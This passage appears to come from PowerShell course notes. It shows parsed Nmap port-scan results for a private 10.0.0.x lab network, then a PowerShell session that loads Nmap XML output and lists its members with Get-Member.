: 10.0.0.49 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.50 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.51 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.52 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.54 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.55 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.56 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.57 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.58 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.59 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.60 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.62 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.63 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.64 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.65 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.66 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.67 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.68 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.69 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.70 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.71 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.72 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.73 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.74 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.75 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.76 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.77 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.78 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.79 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.80 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.81 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.82 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.83 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.84 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.85 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.86 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.87 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.88 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.89 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.90 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.91 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.92 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.93 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.94 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.96 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.97 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.98 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.99 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.100 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.101 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.102 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.103 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.104 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.105 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.106 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.107 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.108 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.109 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.110 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.111 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.112 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.113 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.114 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.115 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.116 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.117 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.118 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.119 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.120 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.121 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.122 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.123 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.124 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.125 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.126 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.127 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.128 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.129 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.130 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.131 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.132 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.133 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.134 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.135 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.136 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.137 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.138 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.139 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.140 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.141 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.142 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.143 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.144 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.145 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.146 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.147 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.148 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.149 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.150 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.151 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.152 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.153 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.154 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.155 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.156 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.157 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.158 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.159 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.160 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.161 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.162 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.163 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.164 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.165 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.166 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.167 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.168 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.169 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.170 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.171 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.172 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.173 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.174 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.175 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.176 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.177 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.178 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.179 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.180 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.181 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.182 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.183 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.184 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.185 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.186 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.187 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.188 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.189 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.190 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.191 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.192 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.193 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.194 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.195 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.196 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.197 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.198 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.199 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.200 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.201 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.202 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.203 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.204 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.205 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.206 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.207 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.208 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.209 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.210 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.211 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.212 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.213 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.214 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.215 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.216 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.217 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.218 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.219 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.220 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.221 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.222 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.223 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.224 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.225 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.226 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.227 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.228 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.229 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.230 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.231 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.232 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.234 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.235 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.236 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.237 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.238 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.239 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.240 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.241 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.242 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.243 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.244 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.245 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.246 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.247 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.248 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.249 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.250 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.251 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.252 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.253 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.255 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.1 IPv6 : MAC : 00:50:F1:80:00:00 Ports : closed:tcp:21:ftp filtered:tcp:22:ssh filtered:tcp:23:telnet closed:tcp:25:smtp open:tcp:53:domain open:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap open:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.19 IPv6 : MAC : BC:9F:EF:69:35:19 Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp closed:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.32 IPv6 : MAC : 90:FD:61:C0:9B:B2 Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp closed:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.53 IPv6 : MAC : 40:F0:2F:57:6C:13 Ports : filtered:tcp:21:ftp filtered:tcp:22:ssh filtered:tcp:23:telnet filtered:tcp:25:smtp filtered:tcp:53:domain filtered:tcp:80:http filtered:tcp:110:pop3 filtered:tcp:111:rpcbind filtered:tcp:135:msrpc filtered:tcp:139:netbios-ssn filtered:tcp:143:imap filtered:tcp:443:https filtered:tcp:445:microsoft-ds filtered:tcp:993:imaps filtered:tcp:995:pop3s filtered:tcp:1723:pptp filtered:tcp:3306:mysql filtered:tcp:3389:ms-wbt-server filtered:tcp:5900:vnc filtered:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.61 IPv6 : MAC : 00:9A:CD:C9:77:54 Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp closed:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.95 IPv6 : MAC : F4:0F:24:33:5E:D1 Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp closed:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.254 IPv6 : MAC : 00:05:04:03:02:01 Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp closed:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 open:tcp:111:rpcbind closed:tcp:135:msrpc closed:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https closed:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql closed:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : HostName : FQDN : Status : up IPv4 : 10.0.0.233 IPv6 : MAC : Ports : closed:tcp:21:ftp closed:tcp:22:ssh closed:tcp:23:telnet closed:tcp:25:smtp open:tcp:53:domain closed:tcp:80:http closed:tcp:110:pop3 closed:tcp:111:rpcbind open:tcp:135:msrpc open:tcp:139:netbios-ssn closed:tcp:143:imap closed:tcp:443:https open:tcp:445:microsoft-ds closed:tcp:993:imaps closed:tcp:995:pop3s closed:tcp:1723:pptp closed:tcp:3306:mysql open:tcp:3389:ms-wbt-server closed:tcp:5900:vnc closed:tcp:8080:http-proxy Services : OS : Script : PS C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell> ``` - Manual ```XML``` Parsing ```PowerShell PS C:\Users\Administrator\Desktop> $nmap = [xml](Get-Content .\10.0.0.1.xml) ``` ```PowerShell PS C:\Users\Administrator\Desktop> $nmap xml nmaprun xml-stylesheet #comment --- ------- -------------- -------- version="1.0" encoding="UTF-8" {, nmaprun} href="file:///C:/Program Files (x86)/Nmap/nmap.... Nmap 7.50 scan initiated Mon Jul 10 09:33:13 ... PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $nmap.nmaprun | Get-Member TypeName: System.String Name MemberType Definition ---- ---------- ---------- Clone Method System.Object Clone(), System.Object ICloneable.Clone() CompareTo Method int CompareTo(System.Object value), int CompareTo(string strB), int IComparable.CompareTo(System.Object obj), int IComparable[string].CompareTo(string other) Contains Method bool Contains(string value) CopyTo Method void CopyTo(int sourceIndex, char[] destination, int destinationIndex, int count) EndsWith Method bool EndsWith(string value), bool EndsWith(string value, System.StringComparison comparisonType), bool EndsWith(string value, bool ignoreCase, cultureinfo culture) Equals Method bool Equals(System.Object obj), bool Equals(string value), bool Equals(string value, System.StringComparison comparisonType), bool IEquatable[string].Equals(str... GetEnumerator Method System.CharEnumerator GetEnumerator(), System.Collections.Generic.IEnumerator[char] IEnumerable[char].GetEnumerator(), System.Collections.IEnumerator IEnumerabl... GetHashCode Method int GetHashCode() GetType Method type GetType() GetTypeCode Method System.TypeCode GetTypeCode(), System.TypeCode IConvertible.GetTypeCode() IndexOf Method int IndexOf(char value), int IndexOf(char value, int startIndex), int IndexOf(char value, int startIndex, int count), int IndexOf(string value), int IndexOf(str... IndexOfAny Method int IndexOfAny(char[] anyOf), int IndexOfAny(char[] anyOf, int startIndex), int IndexOfAny(char[] anyOf, int startIndex, int count) Insert Method string Insert(int startIndex, string value) IsNormalized Method bool IsNormalized(), bool IsNormalized(System.Text.NormalizationForm normalizationForm) LastIndexOf Method int LastIndexOf(char value), int LastIndexOf(char value, int startIndex), int LastIndexOf(char value, int startIndex, int count), int LastIndexOf(string value),... LastIndexOfAny Method int LastIndexOfAny(char[] anyOf), int LastIndexOfAny(char[] anyOf, int startIndex), int LastIndexOfAny(char[] anyOf, int startIndex, int count) Normalize Method string Normalize(), string Normalize(System.Text.NormalizationForm normalizationForm) PadLeft Method string PadLeft(int totalWidth), string PadLeft(int totalWidth, char paddingChar) PadRight Method string PadRight(int totalWidth), string PadRight(int totalWidth, char paddingChar) Remove Method string Remove(int startIndex, int count), string Remove(int startIndex) Replace Method string Replace(char oldChar, char newChar), string Replace(string oldValue, string newValue) Split Method string[] Split(Params char[] separator), string[] Split(char[] separator, int count), string[] Split(char[] separator, System.StringSplitOptions options), strin... StartsWith Method bool StartsWith(string value), bool StartsWith(string value, System.StringComparison comparisonType), bool StartsWith(string value, bool ignoreCase, cultureinfo... Substring Method string Substring(int startIndex), string Substring(int startIndex, int length) ToBoolean Method bool IConvertible.ToBoolean(System.IFormatProvider provider) ToByte Method byte IConvertible.ToByte(System.IFormatProvider provider) ToChar Method char IConvertible.ToChar(System.IFormatProvider provider) ToCharArray Method char[] ToCharArray(), char[] ToCharArray(int startIndex, int length) ToDateTime Method datetime IConvertible.ToDateTime(System.IFormatProvider provider) ToDecimal Method decimal IConvertible.ToDecimal(System.IFormatProvider provider) ToDouble Method double IConvertible.ToDouble(System.IFormatProvider provider) ToInt16 Method int16 IConvertible.ToInt16(System.IFormatProvider provider) ToInt32 Method int IConvertible.ToInt32(System.IFormatProvider provider) ToInt64 Method long IConvertible.ToInt64(System.IFormatProvider provider) ToLower Method string ToLower(), string ToLower(cultureinfo culture) ToLowerInvariant Method string ToLowerInvariant() ToSByte Method sbyte IConvertible.ToSByte(System.IFormatProvider provider) ToSingle Method float IConvertible.ToSingle(System.IFormatProvider provider) ToString Method string ToString(), string ToString(System.IFormatProvider provider), string IConvertible.ToString(System.IFormatProvider provider) ToType Method System.Object IConvertible.ToType(type conversionType, System.IFormatProvider provider) ToUInt16 Method uint16 IConvertible.ToUInt16(System.IFormatProvider provider) ToUInt32 Method uint32 IConvertible.ToUInt32(System.IFormatProvider provider) 